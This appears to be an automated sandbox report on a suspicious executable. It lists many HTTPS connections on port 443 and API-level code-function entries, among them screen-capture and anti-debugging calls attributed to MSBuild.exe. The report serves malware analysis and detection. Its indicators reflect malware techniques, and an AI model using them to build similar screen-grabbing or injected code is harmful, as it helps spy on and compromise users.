Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49945 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

1_2_00411F55

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	1_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6C4FB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4FB8C0 rand_s,NtQueryVirtualMemory,	1_2_6C4FB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	1_2_6C4FB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C49F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6C49F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01001FE0	0_2_01001FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010591C3	0_2_010591C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101D0ED	0_2_0101D0ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104D377	0_2_0104D377
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01059561	0_2_01059561
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01048465	0_2_01048465
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101547C	0_2_0101547C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010454FD	0_2_010454FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01047705	0_2_01047705
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01059933	0_2_01059933
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010139E2	0_2_010139E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100C842	0_2_0100C842
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101B888	0_2_0101B888
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01059D1B	0_2_01059D1B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01058D2E	0_2_01058D2E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01001D65	0_2_01001D65
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100FC40	0_2_0100FC40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01006FEC	0_2_01006FEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041C585	1_2_0041C585
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041B825	1_2_0041B825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0042DA53	1_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0042D2E3	1_2_0042D2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0042CE4E	1_2_0042CE4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041961D	1_2_0041961D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0042DE3B	1_2_0042DE3B
